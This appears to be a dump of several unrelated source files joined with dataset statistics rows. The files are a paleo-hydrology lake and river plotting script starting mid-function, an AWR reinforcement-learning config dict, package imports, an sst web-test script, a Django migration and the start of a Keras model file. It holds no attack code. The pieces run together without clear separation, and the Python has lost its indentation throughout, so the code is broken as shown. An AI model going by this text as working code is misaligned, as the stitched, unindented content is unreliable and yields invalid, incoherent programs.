rdirs_file_basename.replace("DATETIME",str(time)) if
rdirs_file_basename is not None else None,
rdirs_fieldname=
rdirs_fieldname,
minflowcutoff=minflowcutoff,
zoomed=zoomed,
zoom_section_bounds=
zoom_section_bounds,
show_snapshot=show_snapshot),
date_text])
anim = animation.ArtistAnimation(fig,ims,interval=200,blit=False,repeat_delay=500)
plt.show()
#writer = animation.writers['ffmpeg'](fps=7,bitrate=1800)
#anim.save('/Users/thomasriddick/Desktop/deglac.mp4',writer=writer,dpi=1000)
def TwoColourRiverAndLakeAnimationHelperSliceGenerator(self,cmap,norm,
river_flow_filename,
lsmask_filename,
basin_catchment_num_filename,
lake_data_filename,
glacier_data_filename,
river_flow_fieldname,
lsmask_fieldname,
basin_catchment_num_fieldname,
lake_data_fieldname,
glacier_fieldname,
catchment_nums_filename=None,
catchment_nums_fieldname=None,
rdirs_filename=None,
rdirs_fieldname=None,
minflowcutoff=1000000000000.0,
zoomed=False,
zoom_section_bounds={},
show_snapshot=False):
river_flow_object = iodriver.advanced_field_loader(river_flow_filename,
fieldname=river_flow_fieldname,
field_type='Generic',
time_slice=5)
lsmask_field = iodriver.advanced_field_loader(lsmask_filename,
fieldname=lsmask_fieldname,
field_type='Generic')
basin_catchment_nums_field = iodriver.advanced_field_loader(basin_catchment_num_filename,
fieldname=basin_catchment_num_fieldname,
field_type='Generic')
lake_data_field = iodriver.advanced_field_loader(lake_data_filename,
fieldname=lake_data_fieldname,
field_type='Generic',
time_slice=5)
glacier_mask_field = iodriver.advanced_field_loader(glacier_data_filename,
fieldname=glacier_fieldname,
field_type='Generic')
if catchment_nums_filename is not None:
catchment_nums_field = iodriver.advanced_field_loader(catchment_nums_filename,
fieldname=catchment_nums_fieldname,
field_type='Generic')
if rdirs_filename is not None:
rdirs_field = iodriver.advanced_field_loader(rdirs_filename,
fieldname=rdirs_fieldname,
field_type='Generic')
lsmask = lsmask_field.get_data()
basin_catchment_nums = basin_catchment_nums_field.get_data()
river_flow = river_flow_object.get_data()
rivers_and_lakes_field = copy.deepcopy(river_flow_object)
rivers_and_lakes = rivers_and_lakes_field.get_data()
lake_data = lake_data_field.get_data()
glacier_mask = glacier_mask_field.get_data()
rivers_and_lakes[river_flow < minflowcutoff] = 1
rivers_and_lakes[river_flow >= minflowcutoff] = 2
fine_rivers_and_lakes_field = utilities.downscale_ls_mask(rivers_and_lakes_field,
"LatLong10min")
fine_rivers_and_lakes = fine_rivers_and_lakes_field.get_data()
if (rdirs_filename is not None) and (catchment_nums_filename is not None):
ocean_basin_catchments = pts.find_ocean_basin_catchments(rdirs_field,catchment_nums_field,areas=[{'min_lat':70,
'max_lat':115,
'min_lon':195,
'max_lon':265},
{'min_lat':110,
'max_lat':135,
'min_lon':162,
'max_lon':196},
{'min_lat':15,
'max_lat':50,
'min_lon':0,
'max_lon':175}])
fine_ocean_basin_catchments_field = utilities.downscale_ls_mask(ocean_basin_catchments,
"LatLong10min")
fine_ocean_basin_catchments= fine_ocean_basin_catchments_field.get_data()
fine_rivers_and_lakes[np.logical_and(fine_rivers_and_lakes == 1,
fine_ocean_basin_catchments == 1)] = 6
fine_rivers_and_lakes[np.logical_and(fine_rivers_and_lakes == 1,
fine_ocean_basin_catchments == 2)] = 7
fine_rivers_and_lakes[np.logical_and(fine_rivers_and_lakes == 1,
fine_ocean_basin_catchments == 3)] = 8
fine_rivers_and_lakes[basin_catchment_nums > 0 ] = 3
fine_rivers_and_lakes[lake_data > 0] = 4
fine_rivers_and_lakes[glacier_mask == 1] = 5
fine_rivers_and_lakes[lsmask == 1] = 0
if show_snapshot:
plt.clf()
if zoomed:
im = plt.imshow(fine_rivers_and_lakes[zoom_section_bounds["min_lat"]:
zoom_section_bounds["max_lat"]+1,
zoom_section_bounds["min_lon"]:
zoom_section_bounds["max_lon"]+1],
cmap=cmap,norm=norm,interpolation="none")
else:
im = plt.imshow(fine_rivers_and_lakes,cmap=cmap,norm=norm,interpolation="none")
if show_snapshot:
plt.show()
return im
def LakeAndRiverMap(self):
timeinslice="18250"
timeslice="1400"
timeslice_creation_date_time="20190925_225029"
river_flow_filename="/Users/thomasriddick/Documents/data/temp/transient_sim_1/river_model_results_3650.nc"
lsmask_filename=os.path.join(self.ls_masks_data_directory,'generated',
"ls_mask_prepare_basins_from_glac1D_"
+ timeslice_creation_date_time+ "_"
+ timeslice + "_orig.nc")
basin_catchment_num_filename=os.path.join(self.basin_catchment_nums_directory,
"basin_catchment_numbers_prepare_basins"
"_from_glac1D_" + timeslice_creation_date_time +
"_" + timeslice + ".nc")
lake_data_filename="/Users/thomasriddick/Documents/data/temp/transient_sim_1/lake_model_results_3650.nc"
glacier_filename=os.path.join(self.glacier_data_directory,
"GLAC1D_ICEM_10min_ts"+ timeslice+ ".nc")
self.TwoColourRiverAndLakePlotHelper(river_flow_filename,
lsmask_filename,
basin_catchment_num_filename,
lake_data_filename,
glacier_filename,
river_flow_fieldname,
lsmask_fieldname,
basin_catchment_num_fieldname,
lake_data_fieldname,
glacier_fieldname,
minflowcutoff=500000000.0,
lake_grid_type='LatLong10min',
river_grid_type='HD')
def LakeAndRiverMaps(self):
river_flow_file_basename=("/Users/thomasriddick/Documents/data/lake_transient_data/run_1/"
"pmt0531_Tom_lake_16k_DATETIME01.01_hd_higres_ym.nc")
lsmask_file_basename=("/Users/thomasriddick/Documents/data/lake_transient_data/run_1/"
"10min_slm_DATETIME.nc")
basin_catchment_num_file_basename=("/Users/thomasriddick/Documents/data/lake_transient_data/run_1/"
"lake_numbers_DATETIME.nc")
lake_data_file_basename=("/Users/thomasriddick/Documents/data/lake_transient_data/run_1/"
"pmt0531_Tom_lake_16k_DATETIME01.01_diagnostic_lake_volumes.nc")
glacier_file_basename=("/Users/thomasriddick/Documents/data/lake_transient_data/run_1/"
"10min_glac_DATETIMEk.nc")
rdirs_file_basename=("/Users/thomasriddick/Documents/data/lake_transient_data/run_1/"
"hdpara_DATETIMEk.nc")
catchment_nums_file_basename=("/Users/thomasriddick/Documents/data/lake_transient_data/run_1/"
"connected_catchments_DATETIME.nc")
river_flow_fieldname = "friv"
lsmask_fieldname = "slm"
basin_catchment_num_fieldname = "lake_number"
lake_data_fieldname = "diagnostic_lake_vol"
glacier_fieldname = "glac"
rdirs_fieldname="FDIR"
catchment_nums_fieldname="catchments"
self.TwoColourRiverAndLakeAnimationHelper(river_flow_file_basename,
lsmask_file_basename,
basin_catchment_num_file_basename,
lake_data_file_basename,
glacier_file_basename,
river_flow_fieldname,
lsmask_fieldname,
basin_catchment_num_fieldname,
lake_data_fieldname,
glacier_fieldname,
catchment_nums_file_basename=
catchment_nums_file_basename,
catchment_nums_fieldname=
catchment_nums_fieldname,
rdirs_file_basename=
rdirs_file_basename,
rdirs_fieldname=
rdirs_fieldname,
minflowcutoff=1000.0,
zoomed=True,
zoom_section_bounds={"min_lat":50,
"max_lat":500,
"min_lon":100,
"max_lon":800})
def main():
"""Top level function; define some overarching options and which plots to create"""
save = False
show = True
#hd_parameter_plots = HDparameterPlots(save=save)
#hd_parameter_plots.flow_parameter_distribution_for_non_lake_cells_for_current_HD_model()
#hd_parameter_plots.flow_parameter_distribution_current_HD_model_for_current_HD_model_reprocessed_without_lakes_and_wetlands()
#hd_parameter_plots.flow_parameter_distribution_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs()
#hd_parameter_plots.flow_parameter_distribution_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_no_tuning()
#ice5g_comparison_plots = Ice5GComparisonPlots(save=save)
#ice5g_comparison_plots.plotLine()
#ice5g_comparison_plots.plotFilled()
#ice5g_comparison_plots.plotCombined()
#ice5g_comparison_plots.plotCombinedIncludingOceanFloors()
#flowmapplot = FlowMapPlots(save)
#flowmapplot.FourFlowMapSectionsFromDeglaciation()
#flowmapplot.Etopo1FlowMap()
#flowmapplot.ICE5G_data_all_points_0k()
#flowmapplot.ICE5G_data_all_points_0k_no_sink_filling()
#flowmapplot.ICE5G_data_all_points_0k_alg4_two_colour()
#flowmapplot.ICE5G_data_all_points_21k_alg4_two_colour()
#flowmapplot.Etopo1FlowMap_two_colour()
#flowmapplot.Etopo1FlowMap_two_colour_directly_upscaled_fields()
#flowmapplot.Corrected_HD_Rdirs_FlowMap_two_colour()
#flowmapplot.ICE5G_data_ALG4_true_sinks_21k_And_ICE5G_data_ALG4_true_sinks_0k_FlowMap_comparison()
#flowmapplot.Corrected_HD_Rdirs_And_Etopo1_ALG4_sinkless_directly_upscaled_fields_FlowMap_comparison()
#flowmapplot.Corrected_HD_Rdirs_And_Etopo1_ALG4_true_sinks_directly_upscaled_fields_FlowMap_comparison()
#flowmapplot.Corrected_HD_Rdirs_And_ICE5G_data_ALG4_sinkless_0k_directly_upscaled_fields_FlowMap_comparison()
#flowmapplot.Corrected_HD_Rdirs_And_ICE5G_data_ALG4_true_sinks_0k_directly_upscaled_fields_FlowMap_comparison()
#flowmapplot.Corrected_HD_Rdirs_And_ICE5G_data_ALG4_corr_orog_0k_directly_upscaled_fields_FlowMap_comparison()
#flowmapplot.Corrected_HD_Rdirs_And_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k_directly_upscaled_fields_FlowMap_comparison()
#flowmapplot.Corrected_HD_Rdirs_And_ICE5G_data_ALG4_no_true_sinks_corr_orog_0k_directly_upscaled_fields_FlowMap_comparison()
#flowmapplot.Corrected_HD_Rdirs_And_ICE5G_HD_as_data_ALG4_true_sinks_0k_directly_upscaled_fields_FlowMap_comparison()
#flowmapplot.Upscaled_Rdirs_vs_Directly_Upscaled_fields_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison()
#flowmapplot.Ten_Minute_Data_from_Virna_data_ALG4_corr_orog_downscaled_lsmask_no_sinks_21k_vs_0k_FlowMap_comparison()
#flowmapplot.Upscaled_Rdirs_vs_Corrected_HD_Rdirs_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison()
#flowmapplotwithcatchment = FlowMapPlotsWithCatchments(save)
#flowmapplotwithcatchment.Upscaled_Rdirs_vs_Corrected_HD_Rdirs_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison()
#flowmapplotwithcatchment.compare_present_day_and_lgm_river_directions_with_catchments_virna_data_plus_tarasov_style_orog_corrs_for_both()
#flowmapplotwithcatchment.compare_present_day_river_directions_with_catchments_virna_data_with_vs_without_tarasov_style_orog_corrs()
#flowmapplotwithcatchment.compare_lgm_river_directions_with_catchments_virna_data_with_vs_without_tarasov_style_orog_corrs()
#flowmapplotwithcatchment.Upscaled_Rdirs_vs_Corrected_HD_Rdirs_tarasov_upscaled_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison()
#flowmapplotwithcatchment.upscaled_rdirs_with_and_without_tarasov_upscaled_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison()
#flowmapplotwithcatchment.\
#upscaled_rdirs_with_and_without_tarasov_upscaled_north_america_only_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison()
#flowmapplotwithcatchment.\
#Upscaled_Rdirs_vs_Corrected_HD_Rdirs_tarasov_upscaled_north_america_only_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison()
#flowmapplotwithcatchment.\
#Upscaled_Rdirs_vs_Corrected_HD_Rdirs_tarasov_upscaled_north_america_only_data_ALG4_corr_orog_glcc_olson_lsmask_0k_FlowMap_comparison()
#flowmapplotwithcatchment.compare_present_day_and_lgm_river_directions_with_catchments_ICE5G_plus_tarasov_style_orog_corrs_for_both()
#flowmapplotwithcatchment.compare_present_day_and_lgm_river_directions_with_catchments_ICE6G_plus_tarasov_style_orog_corrs_for_both()
#flowmapplotwithcatchment.compare_ICE5G_and_ICE6G_with_catchments_tarasov_style_orog_corrs_for_both()
#outflowplots = OutflowPlots(save)
#outflowplots.Compare_Upscaled_Rdirs_vs_Directly_Upscaled_fields_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k()
#outflowplots.Compare_Corrected_HD_Rdirs_And_ICE5G_as_HD_data_ALG4_sinkless_all_points_0k()
#outflowplots.Compare_Corrected_HD_Rdirs_And_ICE5G_as_HD_data_ALG4_true_sinks_all_points_0k()
#outflowplots.Compare_Corrected_HD_Rdirs_And_ICE5G_ALG4_sinkless_all_points_0k_directly_upscaled_fields()
#outflowplots.Compare_Corrected_HD_Rdirs_And_ICE5G_ALG4_true_sinks_all_points_0k_directly_upscaled_fields()
#outflowplots.Compare_Corrected_HD_Rdirs_And_ICE5G_ALG4_corr_orog_all_points_0k_directly_upscaled_fields()
#outflowplots.Compare_Corrected_HD_Rdirs_And_ICE5G_ALG4_corr_orog_downscaled_ls_mask_all_points_0k_directly_upscaled_fields()
#outflowplots.Compare_Corrected_HD_Rdirs_And_Etopo1_ALG4_sinkless_directly_upscaled_fields()
#outflowplots.Compare_Corrected_HD_Rdirs_And_Etopo1_ALG4_true_sinks_directly_upscaled_fields()
#outflowplots.Compare_Corrected_HD_Rdirs_And_ICE5G_plus_tarasov_upscaled_srtm30_ALG4_corr_orog_0k_directly_upscaled_fields()
#outflowplots.Compare_ICE5G_with_and_without_tarasov_upscaled_srtm30_ALG4_corr_orog_0k_directly_upscaled_fields()
#hd_output_plots = HDOutputPlots()
#hd_output_plots.check_water_balance_of_1978_for_constant_forcing_of_0_01()
#hd_output_plots.plot_comparison_using_1990_rainfall_data()
#hd_output_plots.plot_comparison_using_1990_rainfall_data_adding_back_to_discharge()
#coupledrunoutputplots = CoupledRunOutputPlots(save=save)
#coupledrunoutputplots.ice6g_rdirs_lgm_run_discharge_plot()
#coupledrunoutputplots.extended_present_day_rdirs_lgm_run_discharge_plot()
#coupledrunoutputplots.ocean_grid_extended_present_day_rdirs_vs_ice6g_rdirs_lgm_run_discharge_plot()
#coupledrunoutputplots.extended_present_day_rdirs_vs_ice6g_rdirs_lgm_echam()
#coupledrunoutputplots.extended_present_day_rdirs_vs_ice6g_rdirs_lgm_mpiom_pem()
lake_plots = LakePlots()
#lake_plots.plotLakeDepths()
#lake_plots.LakeAndRiverMap()
lake_plots.LakeAndRiverMaps()
if show:
plt.show()
if __name__ == '__main__':
main()
| 76.46204
| 251
| 0.498706
| 26,455
| 305,160
| 5.216556
| 0.046796
| 0.011565
| 0.018768
| 0.026275
| 0.8552
| 0.810774
| 0.771601
| 0.738399
| 0.702422
| 0.677727
| 0
| 0.045451
| 0.447077
| 305,160
| 3,990
| 252
| 76.481203
| 0.772447
| 0.034654
| 0
| 0.589397
| 1
| 0
| 0.12893
| 0.101547
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024615
| false
| 0.00027
| 0.006221
| 0
| 0.043819
| 0.005139
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5cd0b7126dd3c2f26ab59042dd531fb0e16da5f7
| 5,311
|
py
|
Python
|
awr_configs.py
|
JKinx/awr
|
2b801b05ae71559a0612bcb94be957f941c0194b
|
[
"MIT"
] | null | null | null |
awr_configs.py
|
JKinx/awr
|
2b801b05ae71559a0612bcb94be957f941c0194b
|
[
"MIT"
] | null | null | null |
awr_configs.py
|
JKinx/awr
|
2b801b05ae71559a0612bcb94be957f941c0194b
|
[
"MIT"
] | null | null | null |
AWR_CONFIGS = {
"Ant-v2":
{
"actor_net_layers": [128, 64],
"actor_stepsize": 0.00005,
"actor_momentum": 0.9,
"actor_init_output_scale": 0.01,
"actor_batch_size": 256,
"actor_steps": 1000,
"action_std": 0.2,
"critic_net_layers": [128, 64],
"critic_stepsize": 0.01,
"critic_momentum": 0.9,
"critic_batch_size": 256,
"critic_steps": 200,
"discount": 0.99,
"samples_per_iter": 2048,
"replay_buffer_size": 50000,
"normalizer_samples": 300000,
"weight_clip": 20,
"td_lambda": 0.95,
"temp": 1.0,
},
"HalfCheetah-v2":
{
"actor_net_layers": [128, 64],
"actor_stepsize": 0.00005,
"actor_momentum": 0.9,
"actor_init_output_scale": 0.01,
"actor_batch_size": 256,
"actor_steps": 1000,
"action_std": 0.4,
"critic_net_layers": [128, 64],
"critic_stepsize": 0.01,
"critic_momentum": 0.9,
"critic_batch_size": 256,
"critic_steps": 200,
"discount": 0.99,
"samples_per_iter": 2048,
"replay_buffer_size": 50000,
"normalizer_samples": 300000,
"weight_clip": 20,
"td_lambda": 0.95,
"temp": 1.0,
},
"Hopper-v2":
{
"actor_net_layers": [128, 64],
"actor_stepsize": 0.0001,
"actor_momentum": 0.9,
"actor_init_output_scale": 0.01,
"actor_batch_size": 256,
"actor_steps": 1000,
"action_std": 0.4,
"critic_net_layers": [128, 64],
"critic_stepsize": 0.01,
"critic_momentum": 0.9,
"critic_batch_size": 256,
"critic_steps": 200,
"discount": 0.99,
"samples_per_iter": 2048,
"replay_buffer_size": 50000,
"normalizer_samples": 300000,
"weight_clip": 20,
"td_lambda": 0.95,
"temp": 1.0,
},
"Humanoid-v2":
{
"actor_net_layers": [128, 64],
"actor_stepsize": 0.00001,
"actor_momentum": 0.9,
"actor_init_output_scale": 0.01,
"actor_batch_size": 256,
"actor_steps": 1000,
"action_std": 0.4,
"critic_net_layers": [128, 64],
"critic_stepsize": 0.01,
"critic_momentum": 0.9,
"critic_batch_size": 256,
"critic_steps": 200,
"discount": 0.99,
"samples_per_iter": 2048,
"replay_buffer_size": 50000,
"normalizer_samples": 300000,
"weight_clip": 20,
"td_lambda": 0.95,
"temp": 1.0,
},
"LunarLander-v2":
{
"actor_net_layers": [128, 64],
"actor_stepsize": 0.0005,
"actor_momentum": 0.9,
"actor_init_output_scale": 0.01,
"actor_batch_size": 256,
"actor_steps": 1000,
"action_l2_weight": 0.001,
"critic_net_layers": [128, 64],
"critic_stepsize": 0.01,
"critic_momentum": 0.9,
"critic_batch_size": 256,
"critic_steps": 200,
"discount": 0.99,
"samples_per_iter": 2048,
"replay_buffer_size": 50000,
"normalizer_samples": 100000,
"weight_clip": 20,
"td_lambda": 0.95,
"temp": 1.0,
},
"LunarLanderContinuous-v2":
{
"actor_net_layers": [128, 64],
"actor_stepsize": 0.0001,
"actor_momentum": 0.9,
"actor_init_output_scale": 0.01,
"actor_batch_size": 256,
"actor_steps": 1000,
"action_std": 0.2,
"critic_net_layers": [128, 64],
"critic_stepsize": 0.01,
"critic_momentum": 0.9,
"critic_batch_size": 256,
"critic_steps": 200,
"discount": 0.99,
"samples_per_iter": 2048,
"replay_buffer_size": 50000,
"normalizer_samples": 300000,
"weight_clip": 20,
"td_lambda": 0.95,
"temp": 1.0,
},
"Reacher-v2":
{
"actor_net_layers": [128, 64],
"actor_stepsize": 0.0001,
"actor_momentum": 0.9,
"actor_init_output_scale": 0.01,
"actor_batch_size": 256,
"actor_steps": 1000,
"action_std": 0.2,
"critic_net_layers": [128, 64],
"critic_stepsize": 0.01,
"critic_momentum": 0.9,
"critic_batch_size": 256,
"critic_steps": 200,
"discount": 0.99,
"samples_per_iter": 2048,
"replay_buffer_size": 50000,
"normalizer_samples": 300000,
"weight_clip": 20,
"td_lambda": 0.95,
"temp": 1.0,
},
"Walker2d-v2":
{
"actor_net_layers": [128, 64],
"actor_stepsize": 0.000025,
"actor_momentum": 0.9,
"actor_init_output_scale": 0.01,
"actor_batch_size": 256,
"actor_steps": 1000,
"action_std": 0.4,
"critic_net_layers": [128, 64],
"critic_stepsize": 0.01,
"critic_momentum": 0.9,
"critic_batch_size": 256,
"critic_steps": 200,
"discount": 0.99,
"samples_per_iter": 2048,
"replay_buffer_size": 50000,
"normalizer_samples": 300000,
"weight_clip": 20,
"td_lambda": 0.95,
"temp": 1.0,
}
}
| 25.411483
| 40
| 0.517228
| 611
| 5,311
| 4.165303
| 0.101473
| 0.056582
| 0.075442
| 0.088016
| 0.953635
| 0.953635
| 0.953635
| 0.953635
| 0.953635
| 0.912377
| 0
| 0.151995
| 0.334777
| 5,311
| 209
| 41
| 25.411483
| 0.568356
| 0
| 0
| 0.825843
| 0
| 0
| 0.417357
| 0.039157
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7a3235853a8d38f7ad32b4064e7f709933e1dda3
| 203
|
py
|
Python
|
toyotama/util/__init__.py
|
Laika/Toyotama
|
0eee74f8cd5a8f7d5bcdc5aeab1d74e5af5607de
|
[
"MIT"
] | null | null | null |
toyotama/util/__init__.py
|
Laika/Toyotama
|
0eee74f8cd5a8f7d5bcdc5aeab1d74e5af5607de
|
[
"MIT"
] | null | null | null |
toyotama/util/__init__.py
|
Laika/Toyotama
|
0eee74f8cd5a8f7d5bcdc5aeab1d74e5af5607de
|
[
"MIT"
] | 1
|
2021-07-10T03:52:35.000Z
|
2021-07-10T03:52:35.000Z
|
from toyotama.util.connect import *
from toyotama.util.elf import *
from toyotama.util.integer import *
from toyotama.util.log import *
from toyotama.util.shell import *
from toyotama.util.util import *
| 29
| 35
| 0.793103
| 30
| 203
| 5.366667
| 0.3
| 0.447205
| 0.596273
| 0.68323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118227
| 203
| 6
| 36
| 33.833333
| 0.899441
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7a7bab13a21dff793d54b61c7f33ba2c4816f0e4
| 617
|
py
|
Python
|
src/sst/selftests/current_url.py
|
DramaFever/sst
|
63d41a102c9d3bdb54019f28a93cff0314a0214f
|
[
"Apache-2.0"
] | 4
|
2015-01-21T22:20:50.000Z
|
2017-12-18T11:38:16.000Z
|
src/sst/selftests/current_url.py
|
DramaFever/sst
|
63d41a102c9d3bdb54019f28a93cff0314a0214f
|
[
"Apache-2.0"
] | 63
|
2015-01-13T19:32:06.000Z
|
2020-04-22T17:01:03.000Z
|
src/sst/selftests/current_url.py
|
wbdl/sst
|
7a2805391fdd390ecb0f488f8377f58381358c89
|
[
"Apache-2.0"
] | null | null | null |
import sst
import sst.actions
sst.actions.set_base_url('http://localhost:%s/' % sst.DEVSERVER_PORT)
sst.actions.go_to('/')
url = sst.actions.get_current_url()
base_url = sst.actions.get_base_url()
sst.actions.assert_equal(base_url, 'http://localhost:%s/' % sst.DEVSERVER_PORT)
sst.actions.assert_equal(url, 'http://localhost:%s/' % sst.DEVSERVER_PORT)
sst.actions.go_to('/begin')
url = sst.actions.get_current_url()
base_url = sst.actions.get_base_url()
sst.actions.assert_equal(base_url, 'http://localhost:%s/' % sst.DEVSERVER_PORT)
sst.actions.assert_equal(url, 'http://localhost:%s/begin' % sst.DEVSERVER_PORT)
| 36.294118
| 79
| 0.758509
| 98
| 617
| 4.520408
| 0.183673
| 0.27088
| 0.176072
| 0.191874
| 0.85553
| 0.85553
| 0.85553
| 0.85553
| 0.85553
| 0.85553
| 0
| 0
| 0.06483
| 617
| 16
| 80
| 38.5625
| 0.767764
| 0
| 0
| 0.461538
| 0
| 0
| 0.181524
| 0
| 0
| 0
| 0
| 0
| 0.307692
| 1
| 0
| false
| 0
| 0.153846
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8fb79b1423d3c9882dab25f322f72d029195b6bf
| 2,087
|
py
|
Python
|
cs28TeamProject/parasitologyTool/migrations/0041_auto_20220211_1447.py
|
Eg3-git/cs28-parasitology-tool
|
4389208ed19f7e348ca931bff48d43263451f7f0
|
[
"CC0-1.0"
] | null | null | null |
cs28TeamProject/parasitologyTool/migrations/0041_auto_20220211_1447.py
|
Eg3-git/cs28-parasitology-tool
|
4389208ed19f7e348ca931bff48d43263451f7f0
|
[
"CC0-1.0"
] | null | null | null |
cs28TeamProject/parasitologyTool/migrations/0041_auto_20220211_1447.py
|
Eg3-git/cs28-parasitology-tool
|
4389208ed19f7e348ca931bff48d43263451f7f0
|
[
"CC0-1.0"
] | null | null | null |
# Generated by Django 2.2.17 on 2022-02-11 14:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('parasitologyTool', '0040_rename_post_comment_research_post'),
]
operations = [
migrations.AddField(
model_name='post',
name='likes',
field=models.IntegerField(default=0),
),
migrations.AlterField(
model_name='article',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='comment',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='parasite',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='post',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='researchfile',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='researchimage',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='researchpost',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='userprofile',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| 35.372881
| 108
| 0.596071
| 211
| 2,087
| 5.71564
| 0.241706
| 0.079602
| 0.165837
| 0.192371
| 0.712272
| 0.712272
| 0.712272
| 0.712272
| 0.712272
| 0.712272
| 0
| 0.014037
| 0.283182
| 2,087
| 58
| 109
| 35.982759
| 0.792112
| 0.022041
| 0
| 0.673077
| 1
| 0
| 0.082884
| 0.018637
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019231
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
89113e999defa99b0020cf494b95904ba793df5f
| 33,060
|
py
|
Python
|
src/models.py
|
anirbanlahiri2017/Tartarus
|
13d01266511e5d64a77cdb071960cc58ee8c47a0
|
[
"MIT"
] | 104
|
2017-06-30T06:51:54.000Z
|
2022-02-17T08:47:57.000Z
|
src/models.py
|
anirbanlahiri2017/Tartarus
|
13d01266511e5d64a77cdb071960cc58ee8c47a0
|
[
"MIT"
] | 5
|
2017-11-24T04:12:02.000Z
|
2021-06-03T08:20:21.000Z
|
src/models.py
|
anirbanlahiri2017/Tartarus
|
13d01266511e5d64a77cdb071960cc58ee8c47a0
|
[
"MIT"
] | 26
|
2017-07-19T07:19:25.000Z
|
2022-01-02T00:19:04.000Z
|
from keras.layers import Dense, Dropout, Activation, Flatten, Permute, Lambda, Input, merge, BatchNormalization, Embedding, LSTM, Bidirectional, Reshape, GRU, Merge, ELU
from keras.layers import Convolution1D, GlobalMaxPooling1D, Convolution2D, MaxPooling2D, AveragePooling2D, ZeroPadding2D, MaxPooling1D
from keras.regularizers import l2, l1
from keras import regularizers
from keras.models import Sequential, Model
import logging
from keras import backend as K
import keras
import theano.tensor as T
import numpy as np
import pickle
import common
params_1 = {
# dataset params
'dataset' : {
'fact' : '',
'dim' : 200,
'dataset' : '',
'window' : 15,
'nsamples' : 'all',
'npatches' : 3
},
# training params
'training' : {
'decay' : 1e-6,
'learning_rate' : 0.1,
'momentum' : 0.95,
'n_epochs' : 100,
'n_minibatch' : 32,
'nesterov' : True,
'validation' : 0.1,
'test' : 0.1,
'loss_func' : 'cosine',
'optimizer' : 'adam'
},
# cnn params
'cnn' : {
'dropout_factor' : 0.5,
'n_dense' : 0,
'n_dense_2' : 0,
'n_filters_1' : 1024,
'n_filters_2' : 1024,
'n_filters_3' : 2048,
'n_filters_4' : 2048,
'n_filters_5' : 0,
'n_kernel_1' : (4, 96),
'n_kernel_2' : (4, 1),
'n_kernel_3' : (4, 1),
'n_kernel_4' : (1, 1),
'n_kernel_5' : (1, 1),
'n_out' : '',
'n_pool_1' : (4, 1),
'n_pool_2' : (4, 1),
'n_pool_3' : (1, 1),
'n_pool_4' : (1, 1),
'n_pool_5' : (1, 1),
'n_frames' : 322,
'n_mel' : 96,
'architecture' : 2,
'batch_norm' : False,
'dropout' : True
},
'predicting' : {
'trim_coeff' : 0.15
},
'evaluating' : {
'get_map' : False,
'get_p' : True,
'get_knn' : False
}
}
